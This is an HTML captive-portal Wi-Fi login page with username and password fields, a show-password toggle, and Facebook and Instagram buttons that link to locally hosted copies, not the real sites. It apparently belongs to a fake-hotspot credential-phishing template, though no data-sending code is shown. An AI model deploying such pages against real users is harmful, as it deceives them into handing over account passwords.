<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Wi-Fi Login</title>
<link rel="stylesheet" href="static/css/styles.css">
</head>
<body>
<div class="login-container">
  <h1>Welcome to Captive Wi-Fi</h1>
  <p class="description">
    Connect with us and enjoy high-speed internet access. Please log in using your username and password or choose a social login option below to access exclusive content. 
  </p>
  <form class="login-form" method="post">
    <input type="text" id="username" placeholder="Username" required>
    <input type="password" id="password" placeholder="Password" required>
    <label for="show-password">
      <input type="checkbox" id="show-password"> Show Password
    </label>
    <button type="submit">Connect</button>
  </form>
  <div class="social-login">
    <p>Or connect with:</p>
    <a href="static/facebook/index.html" class="facebook-btn">
      <img src="static/img/facebook.png" alt="Facebook logo">
      Facebook
    </a>
    <a href="static/instagram/index.html" class="instagram-btn">
      <img src="static/img/instagram.png" alt="Instagram logo">
      Instagram
    </a>
  </div>
  <p class="help-text">
    Need help? Contact the front desk for assistance.
  </p>
</div>
<!-- JavaScript to handle the "Show Password" functionality -->
<script>
document.addEventListener('DOMContentLoaded', function () {
  var showPasswordCheckbox = document.getElementById('show-password');
  var passwordInput = document.getElementById('password');
  
  showPasswordCheckbox.addEventListener('change', function (e) {
    if (showPasswordCheckbox.checked) {
      passwordInput.type = 'text';
    } else {
      passwordInput.type = 'password';
    }
  });
});
</script>
</body>
</html>
